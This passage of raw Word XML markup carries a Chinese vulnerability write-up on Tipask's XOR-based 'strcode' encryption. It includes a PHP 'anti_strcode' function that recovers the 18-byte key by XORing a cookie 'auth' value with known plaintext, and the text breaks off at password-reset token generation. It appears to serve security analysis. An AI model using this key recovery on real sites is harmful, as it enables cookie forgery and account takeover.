                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="44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$key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substr(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md5($_SERV</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>ER[ "HTTP_USER_AGENT"] .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$auth_key), 8, 18);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1211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$string = $action ==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'ENCODE' ?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string :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base64_decode($string);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="198" w:lineRule="exact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$len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strlen(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$key);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$code = '';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strlen($string); $i++) {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$k = $i % $len;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code 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$string[$i] ^ $key[$k];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MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>在核心加密算法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-87"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">strcode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>函数中：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:sectPr w:rsidR="00292EF3">
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="134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5921" style="width:337.75pt;height:83.7pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6755,1674">
            <v:rect id="_x0000_s5949" style="position:absolute;left:5;top:5;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5948" type="#_x0000_t75" style="position:absolute;left:185;top:248;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5947" style="position:absolute;left:585;top:248;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5946" style="position:absolute;left:1187;top:248;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5945" style="position:absolute;left:1308;top:248;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5944" style="position:absolute;left:1428;top:248;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5943" style="position:absolute;left:1549;top:248;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5942" style="position:absolute;left:2392;top:248;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5941" style="position:absolute;left:2513;top:248;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5940" style="position:absolute;left:2754;top:248;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5939" style="position:absolute;left:2874;top:248;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5938" style="position:absolute;left:3838;top:248;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5937" style="position:absolute;left:3959;top:248;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5936" style="position:absolute;left:4079;top:248;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5935" style="position:absolute;left:4200;top:248;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5934" style="position:absolute;left:4802;top:248;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5933" style="position:absolute;left:4923;top:248;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5932" style="position:absolute;left:5043;top:248;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5931" style="position:absolute;left:5;top:511;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5930" style="position:absolute;left:185;top:574;width:2530;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5929" style="position:absolute;left:5;top:837;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5928" type="#_x0000_t75" style="position:absolute;left:185;top:900;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5927" style="position:absolute;left:585;top:900;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5926" style="position:absolute;left:1308;top:900;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5925" style="position:absolute;left:1428;top:900;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5924" style="position:absolute;left:5;top:1163;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5923" style="position:absolute;left:185;top:1226;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5922" type="#_x0000_t202" style="position:absolute;left:3;top:3;width:6750;height:1669" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="8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180" w:right="1693" w:firstLine="3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$code = $action ==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'DECODE' ?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code :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base64_encode($code);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="198" w:lineRule="exact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$code;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8"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="35" w:line="285" w:lineRule="auto"/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rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可以看到加密的算法是异或，所以可以用密文和明文异或的方法反</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95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来求出密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>钥</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-62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key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，如下：</w:t>
      </w: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5844" style="width:341.45pt;height:197.8pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6829,3956">
            <v:rect id="_x0000_s5920" style="position:absolute;left:5;top:5;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5919" style="position:absolute;left:185;top:248;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5918" style="position:absolute;left:1149;top:248;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5917" style="position:absolute;left:1269;top:248;width:2651;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5916" style="position:absolute;left:3920;top:248;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5915" style="position:absolute;left:4041;top:248;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5914" style="position:absolute;left:5;top:511;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5913" style="position:absolute;left:185;top:574;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5912" style="position:absolute;left:5;top:837;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5911" type="#_x0000_t75" style="position:absolute;left:185;top:900;width:600;height:200">
              <v:imagedata r:id="rId73" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5910" style="position:absolute;left:785;top:900;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5909" style="position:absolute;left:1267;top:900;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5908" style="position:absolute;left:1387;top:900;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5907" style="position:absolute;left:5;top:1163;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5906" type="#_x0000_t75" style="position:absolute;left:185;top:1226;width:600;height:200">
              <v:imagedata r:id="rId74" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5905" style="position:absolute;left:785;top:1226;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5904" style="position:absolute;left:1749;top:1226;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5903" style="position:absolute;left:1869;top:1226;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5902" style="position:absolute;left:1990;top:1226;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5901" style="position:absolute;left:2110;top:1226;width:4218;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5900" style="position:absolute;left:6328;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5899" style="position:absolute;left:6428;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5898" style="position:absolute;left:6528;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5897" style="position:absolute;left:6628;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5896" style="position:absolute;left:6728;top:1226;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5895" style="position:absolute;left:5;top:1489;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5894" type="#_x0000_t75" style="position:absolute;left:185;top:1552;width:600;height:200">
              <v:imagedata r:id="rId73" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5893" style="position:absolute;left:785;top:1552;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5892" style="position:absolute;left:1508;top:1552;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5891" style="position:absolute;left:1628;top:1552;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5890" style="position:absolute;left:1749;top:1552;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5889" style="position:absolute;left:1869;top:1552;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5888" style="position:absolute;left:2110;top:1552;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5887" style="position:absolute;left:2231;top:1552;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5886" style="position:absolute;left:2472;top:1552;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5885" style="position:absolute;left:2592;top:1552;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5884" style="position:absolute;left:2713;top:1552;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5883" style="position:absolute;left:2833;top:1552;width:362;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5882" style="position:absolute;left:3195;top:1552;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5881" style="position:absolute;left:3315;top:1552;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5880" style="position:absolute;left:5;top:1815;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5879" type="#_x0000_t75" style="position:absolute;left:185;top:1878;width:720;height:200">
              <v:imagedata r:id="rId75" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5878" style="position:absolute;left:5;top:2141;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5877" style="position:absolute;left:185;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5876" style="position:absolute;left:285;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5875" style="position:absolute;left:385;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5874" style="position:absolute;left:485;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5873" style="position:absolute;left:585;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5872" style="position:absolute;left:685;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5871" style="position:absolute;left:785;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5870" style="position:absolute;left:885;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5869" style="position:absolute;left:985;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5868" style="position:absolute;left:1085;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5867" style="position:absolute;left:1185;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5866" style="position:absolute;left:1285;top:2204;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5865" style="position:absolute;left:1385;top:2204;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5864" style="position:absolute;left:1867;top:2204;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5863" style="position:absolute;left:1987;top:2204;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5862" style="position:absolute;left:2228;top:2204;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5861" style="position:absolute;left:2349;top:2204;width:1446;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5860" style="position:absolute;left:3795;top:2204;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5859" style="position:absolute;left:3915;top:2204;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5858" style="position:absolute;left:4036;top:2204;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5857" style="position:absolute;left:4156;top:2204;width:1687;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5856" style="position:absolute;left:5;top:2467;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5855" type="#_x0000_t75" style="position:absolute;left:185;top:2530;width:720;height:200">
              <v:imagedata r:id="rId75" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5854" style="position:absolute;left:5;top:2793;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5853" type="#_x0000_t75" style="position:absolute;left:185;top:2856;width:600;height:200">
              <v:imagedata r:id="rId73" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5852" style="position:absolute;left:5;top:3119;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5851" type="#_x0000_t75" style="position:absolute;left:185;top:3182;width:600;height:200">
              <v:imagedata r:id="rId74" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s5850" style="position:absolute;left:785;top:3182;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5849" style="position:absolute;left:1508;top:3182;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5848" style="position:absolute;left:1628;top:3182;width:603;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5847" style="position:absolute;left:5;top:3445;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5846" style="position:absolute;left:185;top:3508;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s5845" type="#_x0000_t202" style="position:absolute;left:3;top:3;width:6788;height:3951" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="7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0" w:right="4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anti_strcode($authstr, $plaintxt)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780" w:right="444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$key ='';</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126" w:line="388" w:lineRule="auto"/>
                      <w:ind w:left="780" w:right="444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$authstr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urldecode(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base64_decode($authstr)); for($i = 0; $i &lt; 18; $i++)</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="2"/>
                      <w:ind w:left="7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1380" w:right="444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key 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$authstr[$i] ^ $plaintxt[$i];</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="7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292EF3">
                    <w:pPr>
                      <w:rPr>
                        <w:rFonts w:ascii="MS Mincho"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="7"/>
                      <w:rPr>
                        <w:rFonts w:ascii="MS Mincho"/>
                        <w:sz w:val="14"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="1"/>
                      <w:ind w:left="780" w:right="444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$key;</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="124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8"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="34" w:line="309" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="239"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>长度为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-51"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，因此我们要找一个明文长度超过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>而被加密的字串，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>经过检查，发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-57"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-57"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">auth </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>值长度超过了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rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，因此将针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-54"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">co okie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-55"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">auth </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-55"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>猜解。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-57"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Tipask </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>的密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>重置中，生成密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
